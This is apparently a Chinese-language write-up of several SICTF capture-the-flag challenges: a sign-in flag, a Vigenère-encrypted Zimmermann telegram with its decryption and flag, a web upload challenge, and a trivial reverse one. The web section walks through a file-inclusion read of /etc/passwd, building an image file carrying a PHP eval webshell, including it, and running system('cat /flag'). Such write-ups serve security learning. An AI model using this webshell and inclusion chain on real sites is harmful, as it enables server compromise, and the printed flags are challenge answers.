Misc
签到
SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53}
Crypto
[签到]Vigenere
附件内容:
Gn taj xirly gf Fxgjuakd, oe igywnd mt tegbs mnrxxlrivywd sngearbsw wakksre. Bs kpimj gf tank, it bx gur bslenmngn th jfdetagur mt ceei yze Ugnled Lystel tx Amxwaca gjmtrtq.
An taj wvegy gf tank nom xmccxjvinz, bw prhugse ts sllbffce hs lhe ytdlopnfg btxas wbyz Meqnuo: Tafl we lmsll ffce wtw logxyzer tsv madj heavj logxyzer. Pj khaeq yivLNUTF{4695vft9-fd68-4684-uj81-u6c1avg6uaft}j yenxwgus ynfanvnsl snuhorm, ffd ag zfdekxlanwnfg og tmr ptwl thty Eexbhg is mt jechsiuek yze lhxl tekwatokd an Nxb Eexbhg, Teqfk, anw Fjizhss. Thx iwtabqk of ljltlxrwnt tww leyy lo yhz.
Qou tww inlyjucmjv to bsxorf yze Pkjkidxsl [of Fjpich] tx thx ftovx nf thx ljeamjkt chsxidxsue al xgon tx at il hwrttnf thty lhekj oile gw an hzlbrxfc of pfj wimm lhe Nsatew Xlatxx snd lzygely lham yze Pkjkidxsl, on ank owg nfitbflivx, nfvimj Bapts lo ifrwdityw adajjenvj oita yzis iqsn; am yze strw tifj, gffxw lo mxiaatx gwtwxjf Jaiff anw tmrsxqnes.
Iqwasx hsll mt lhe tylenmngn oy yze Pkjkidxsl thty lhe kzlhlxxk emiqgymxsl of hzj suursrigjk nop txfekx lhe iwgspxhl of vtepeeqang Xsylagi lo mtpw pethw in t kww mhslhs.
用网站解密维吉尼亚密码(https://www.guballa.de/vigenere-solver)
On the first of February, we intend to begin unrestricted submarine warfare. In spite of this, it is our intention to endeavour to keep the United States of America neutral.
In the event of this not succeeding, we propose an alliance on the following basis with Mexico: That we shall make war together and make peace together. We shall givSICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}e generous financial support, and an understanding on our part that Mexico is to reconquer the lost territory in New Mexico, Texas, and Arizona. The details of settlement are left to you.
You are instructed to inform the President [of Mexico] of the above in the greatest confidence as soon as it is certain that there will be an outbreak of war with the United States and suggest that the President, on his own initiative, invite Japan to immediate adherence with this plan; at the same time, offer to mediate between Japan and ourselves.
Please call to the attention of the President that the ruthless employment of our submarines now offers the prospect of compelling England to make peace in a few months.
SICTF{4695cab9-fd68-4684-be81-c6c1acb6cafa}
Web
100%_upload
考查文件上传。但是需要搭配文件包含
这题使用使用 图片马 + 文件包含 绕过
发现file参数,测试发现存在文件包含漏洞,访问这里发现的
http://yuanshen.life:37548/index.php?file=/etc/passwd
我们先上传一个图片马,因为它检测后缀名和文件内容(不能包含“php”字母),用BurpSuite抓包
cmd使用 cmd /c “copy /b 1.png+1.php shell.png” 制作图片马,
报错解决:powershell Copy-Item:找不到接受参数“+”的位置参数 _大数据知识库
1.php 内容为一句话木马<?=eval($_POST[1]);?>
1.png 用画图创建出来就行
然后上传shell.png这个图片马,上传成功
用文件包含的漏洞访问这个地址,执行phpinfo()成功;
http://yuanshen.life:37548/index.php?file=uploads/shell.png
接下来直接查看根目录的flag就行了
POST发包:
1=system('cat /flag');
蚁剑也可以连接
Reverse
[签到]Baby_C++
记事本打开直接搜索SICTF
不会逆向只会这样QAQ
